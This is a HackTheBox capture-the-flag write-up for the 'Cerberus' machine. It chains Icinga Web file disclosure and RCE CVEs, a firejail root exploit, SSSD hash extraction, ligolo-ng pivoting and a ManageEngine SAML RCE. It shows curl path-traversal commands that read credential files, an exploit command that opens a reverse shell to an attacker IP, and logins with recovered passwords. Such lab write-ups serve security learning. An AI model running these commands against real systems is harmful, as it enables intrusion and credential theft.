Cerberus is a hard machine from HackTheBox. It involves exploiting File Read and RCE CVEs in icinga to get foothold, escalating privileges by LPE CVE in firejail, pivoting to DC and finally getting SYSTEM by exploiting RCE in ADSelfService Plus.
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Did not follow redirect to http://icinga.cerberus.local:8080/icingaweb2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.52 (Ubuntu)
Port 8080 (HTTP)
In the nmap scan, we found that port 8080 is open and redirects to
icinga.cerberus.local , so let’s add it in the
/etc/hosts file. Then, navigating to the website, we get the following login page.
Icinga is an open-source computer system and network monitoring application. While searching on google about it, i came across following blog post which shares detail about recent CVEs in the Incinga web.
Path Traversal Vulnerabilities in Icinga Web
We recently discovered two critical vulnerabilities in the IT monitoring dashboard Icinga Web. Let's review their…
Arbitrary File Disclosure (CVE-2022–24716)
Trying out the given PoC in the above blog, we can successfully read files from the system.
curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/hosts -scurl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/resources.ini
resources.ini file, we can get the credentials for icinga login.
curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/resources.ini -s
Using the credentials, we get logged in as
Remote Code Execution (CVE-2022–24715)
The above mentioned blog also provides the details to exploit authenticated RCE in icinga. But, i will be using the following PoC to exploit this CVE.
GitHub - JacobEbben/CVE-2022-24715: Authenticated Remote Code Execution in Icinga Web 2 <2.8.6…
Authenticated Remote Code Execution in Icinga Web 2 <2.8.6, <2.9.6, <2.10 - GitHub …
Running the exploit, we can see that what options we need to provide.
In the options, we need to provide a private key (PEM) file. It can be generated by the following command
ssh-keygen -m pem
Now that we have all things we need, running the exploit, we get a reverse shell as
www-data on the box.
python3 exploit.py -t http://icinga.cerberus.local:8080/icingaweb2/ -I 10.10.14.30 -P 4444 -u matthew -p IcingaWebPassword2023 -e ./mykey
Firejail PrivEsc (CVE-2022–31214)
While enumerating, we found that firejail is a SUID binary.
Searching on google, it can be found that it has a privilege escalation vulnerability. Following resource provides the PoC to exploit this vulnerability in Firejail.
oss-security - firejail: local root exploit reachable via --join logic (CVE-2022-31214)
] [thread-next>] [day] [month] [year] [list] Date: Wed, 8 Jun 2022 14:48:47 +0200 From: Matthias Gerstner To…
This blog says that firejail version 0.9.68 and older are vulnerable. So, checking the version on the machine, we can confirm that it is vulnerable.
Download and transfer the firejail exploit onto the target. When running it gives a command to run on another terminal.
So, we pop another shell and run the given command. After that we can just switch to root user.
Post Compromise Enumeration
After some enumeration, we can guess that this machine is domain joined. Looking at the
/etc/hosts file, we can get the IP of DC.
Since, this is domain joined linux machine, searching on google i found the following:
sssdon a Linux system is responsible for enabling the system to access authentication services from a remote source such as Active Directory.
We can confirm that it is being used on this system by looking at the config file.
The following resource shows that we can extract credentials from the SSSD db file.
SSSD Privilege Escalation | Exploit Notes
SSSD (System Security Services Daemon) provides a set of daemons to manage access to remote directory services and…
So, we move into the SSSD db directory and running strings on the db file, we get a username and a hash.
Cracking the hash using John, we get password of matthew user.
Pivoting to DC
Since, we know that DC is on another network, so we need to establish a tunnel to pivot to it. I will be using ligolo-ng for this task.
GitHub - nicocha30/ligolo-ng: An advanced, yet simple, tunneling/pivoting tool that uses a TUN…
An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface. - GitHub - nicocha30/ligolo-ng: An…
Download ligolo-proxy and run the following commands on our box to set it up.
# on kali
sudo ip tuntap add user plugin mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 172.16.22.0/24 dev ligolo
Now, we need to transfer the ligolo-agent on the target machine. And run the following command.
./agent -connect 10.10.14.30:11601 -ignore-cert
Now that connection is etablished, we need to start the tunnel from ligolo proxy.
Now that tunnel is established, we can easily interact with the DC. Using the crackmapexec, we can confirm that credentials are working on DC.
crackmapexec winrm 172.16.22.1 -u matthew -p 147258369
Using evil-winrm, we login on the server and get the user flag.
While enumeration, looking at the program files, we found the manage engine folder, which contains AD Self Service folder.
ADSelfService Plus is an identity security solution. It is used for password management on domain.
This service runs on port 9251. Since, it will have an interface, it tried to open it in browser, but it did not open. I got curious and port scanned the DC using static nmap from the linux machine and found that it had only one open port.
But from shell on the DC, we can see that port is open.
The next step, i did was to transfer the windows ligolo-agent to the DC and make a connection to our host.
Then, switch the ligolo session to this one.
Now, when we open
https://172.16.22.1:9251/ in our browser, it redirects to
dc.cerberus.local , let’s add this in our
Now, opening the URL, we get the following login page
Using the credentials of matthew, we can login but it says that we are not authorized to view.
ManageEngine ADSelfService Plus Unauthenticated SAML RCE (CVE-2022–47966)
There’s nothing else that we can do. Searching on google, came across a recent CVE in the Manage Engine AD Self Service. It can exploited by Metasploit.
ManageEngine ADSelfService Plus Unauthenticated SAML RCE
Rapid7's VulnDB is curated repository of vetted computer software exploits and exploitable vulnerabilities.
But to run the metasploit exploit, we need to set some options, specially GUID and ISSUER_URL. We can see the GUID in the URL in above screen shot where it says unauthorized. For issuer URL, we can find it on google.
After providing all options, it looks like following
Running the exploit, we get shell as SYSTEM.
- Icinga Web2 Vulnerability: https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/
- CVE-2022–24715 (RCE): https://github.com/Icinga/icingaweb2/security/advisories/GHSA-v9mv-h52f-7g63
- Firejail Exploit: https://www.openwall.com/lists/oss-security/2022/06/08/10
- SSSD Abuse: https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sssd-privilege-escalation/
- Ligolo-ng: https://github.com/nicocha30/ligolo-ng
- ManageEngine Exploit: https://github.com/rapid7/metasploit-framework/pull/17527
- ManageEngine CVE: https://www.rapid7.com/db/modules/exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966/